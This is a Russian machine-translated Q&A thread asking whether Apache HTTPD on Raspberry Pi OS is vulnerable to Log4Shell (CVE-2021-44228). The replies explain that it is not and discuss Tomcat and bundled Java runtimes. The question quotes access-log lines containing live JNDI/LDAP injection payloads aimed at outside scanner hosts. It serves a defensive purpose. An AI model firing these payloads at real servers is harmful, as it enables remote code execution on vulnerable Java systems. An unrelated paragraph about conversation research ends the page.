Рейтинг:44

Использует ли веб-сервер Apache log4j (CVE-2021-44228)?

флаг cn

Использует ли веб-сервер apache (apache2) log4j?

У меня есть Apache2 2.4.38 (debian), установленный на ОС Raspberry Pi (64 бит), и я обнаружил в своем журнале некоторые странные записи, касающиеся CVE-2021-44228 от kryptoslogic-cve-2021-44228.com (приманка/сканер), datastatistics.com (автономный и вредоносный?) и a8fvkc.dnslog.cn (я не знаю что это)

Что мне теперь делать?

  • ничего, потому что apache2 не подвержен CVE-2021-44228
  • отформатируйте все и подождите несколько дней, прежде чем я установлю пропатченную версию
  • «проверьте», есть ли какие-либо новые файлы .class и не продолжаются ли операции (и используйте ручные исправления, такие как log4j2.formatMsgNoLookups = ИСТИНА
  • что-то другое

Журналы:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/дек/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/дек/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Криптос Логик Контрольная"
139.59.99.80 - - [12/дек/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/дек/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/дек/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Криптос Логик Контрольная"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.datastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.datastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}"
137.184.106.119 - - [10/дек/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/дек/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ а}"
Tilman Schmidt avatar
флаг bd
Пожалуйста, поделитесь этими «странными» записями журнала, которые вы упомянули. Их трудно оценить, не видя.
user3067860 avatar
флаг ng
Обратите внимание: то, что _некоторое_ программное обеспечение не затронуто, не означает, что вы не используете другое программное обеспечение, которое может быть затронуто.
Рейтинг:82
флаг mx

HTTP-сервер Apache написан не на Java, не использует библиотеку log4j, поэтому на него не влияет CVE-2021-44228.

Ваши файлы журналов взяты из журнала доступа, они показывают людей, сканирующих уязвимость log4j.

mckenzm avatar
флаг in
Приятно видеть, что Tomcat покрыт другим ответом.
флаг mx
Не имеет прямого отношения, но если вы найдете этот QA для проверки настройки HTTP-сервера Apache, обязательно обновите его до версии 2.4.52. Предыдущие версии имеют свои [уязвимости] (https://httpd.apache.org/security/vulnerabilities_24.html), такие как [CVE-2021-44224] (https://cve.mitre.org/cgi-bin/cvename). .cgi?name=CVE-2021-44224).
Рейтинг:8
флаг ng

Сам Apache не написан на Java и напрямую не связывает печально известную библиотеку Log4j. Он особенно защищен от этой уязвимости.

Тогда что еще может пойти не так?

  1. Не все с Apache в названии и HTTP-функциями точно в HTTPD-сервер Apache.Например, Apache Tomcat — это совершенно другой HTTP-веб-сервер. Он написан на Java и может быть настроен для использования Log4J. Я не совсем уверен, возможно ли вообще войти в Tomcat иначе.

Кто-то с меньшим опытом и знаниями вполне способен ошибиться в этих двух. И, насколько мне известно, у Tomcat в целом лучший послужной список безопасности, чем у «классического» Apache HTTPD.

(Согласно комментарию Боба, средство ведения журнала по умолчанию в Tomcat не Log4J.)

  1. Apache HTTPD очень расширяемый. Его можно настроить для вызова других вещей в фоновом режиме с помощью различных интерфейсов (например, для получения динамических веб-страниц, которые генерируются программно). Некоторые из этих «вещей в фоновом режиме» могут быть основаны на Java и связаны с библиотекой Log4J.

Ваш пробег может варьироваться, особенно если вы не знаете в деталях свой программный стек.


Чтобы быть уверенным, вы должны сначала проверить, установлена ​​ли у вас какая-либо машина Java. В вашем менеджере пакетов эти пакеты будут называться JRE-something, JVM-something или, может быть, JAVA-something.

Вы также можете попробовать:

Java-версия

в твоей оболочке.

Если у вас их нет и вы не устанавливали JAVA вне своего менеджера пакетов, вы в безопасности.

Небезопасно в целом, но, по крайней мере, защищено от CVE-2021-44228.

флаг kz
Bob
*> Я не совсем уверен, что в Tomcat вообще возможно вести другой журнал.* Tomcat по умолчанию не использует log4j, если не настроено иначе. [По умолчанию используется `java.util.logging` через ответвление Apache Commons Logging.](https://tomcat.apache.org/tomcat-9.0-doc/logging.html) В 8.0 [инструкции](https: //tomcat.apache.org/tomcat-8.0-doc/logging.html#Using_Log4j) были предоставлены для переключения на log4j, но они были [удалены] (https://tomcat.apache.org/tomcat-8.5-doc/logging .html) в версии 8.5.
флаг kz
Bob
*> Если у вас нет ничего из этого и вы не устанавливали JAVA вне своего менеджера пакетов, вы в безопасности.* Природа JRE и то, как она распространяется, означает, что многие приложения могут и будут встраивать ее, а не использовать. менеджер пакетов ОС (если он вообще существует... см. Windows и macOS). Конечно, **не**безопасно предполагать, что у вас нет уязвимых программ просто потому, что вы не устанавливали Java самостоятельно, менеджер пакетов или что-то еще. Эти встроенные версии обычно не являются частью вашего `PATH`, поэтому тестирование `java` в вашей оболочке не является гарантией безопасности.
fraxinus avatar
флаг ng
Q явно спрашивает о Rapsbian. В Linux приложения (особенно серверные) обычно не приносят свою JVM, они просто указывают ее как зависимость, а менеджер пакетов приносит все необходимое.
флаг ec
@fraxinus, хотя многие люди пытаются разрушить это такими вещами, как Snaps.
флаг il
@fraxinus, вы не можете делать такое обобщение. Эластичные продукты включают, например, собственную JRE. В современной Java нет даже отдельной JRE — предполагается, что разработчики компилируют ее для нужд своего приложения.
флаг kz
Bob
@fraxinus Проблема, когда речь идет о безопасности, заключается в том, что «в целом» недостаточно. Существует достаточно продуктов, особенно крупных корпоративных продуктов (в том числе для Linux), которые будут объединять свои собственные JRE, что вызывает законную озабоченность. Тем более с такой серьезной уязвимостью. Кроме того, хотя этот вопрос может относиться конкретно к Raspbian, заголовок вопроса может побудить других взглянуть на вопрос - и IMO, давая советы по безопасности, действительно лучше всего охватывать все основы.
fraxinus avatar
флаг ng
Вы просто НЕ МОЖЕТЕ охватить все основы в безопасности ответа на простой вопрос. Знание своего стека программного обеспечения необходимо, и если вы этого не сделаете, вы заслуживаете того, что получаете. Без этого вы прибегаете к рецептам со словом «обычно».
mckenzm avatar
флаг in
@fraxinus они наверняка знают. Кейсы Primo включают Minecraft и Arduino. Они привозят свои. Не только это, но и большое количество контейнеров вращается вокруг предварительной версии 8 и даже предварительной версии 6. Контейнеры должны посадить в тюрьму этот %&^!.

Ответить или комментировать

Большинство людей не понимают, что склонность к познанию нового открывает путь к обучению и улучшает межличностные связи. В исследованиях Элисон, например, хотя люди могли точно вспомнить, сколько вопросов было задано в их разговорах, они не чувствовали интуитивно связи между вопросами и симпатиями. В четырех исследованиях, в которых участники сами участвовали в разговорах или читали стенограммы чужих разговоров, люди, как правило, не осознавали, что задаваемый вопрос повлияет — или повлиял — на уровень дружбы между собеседниками.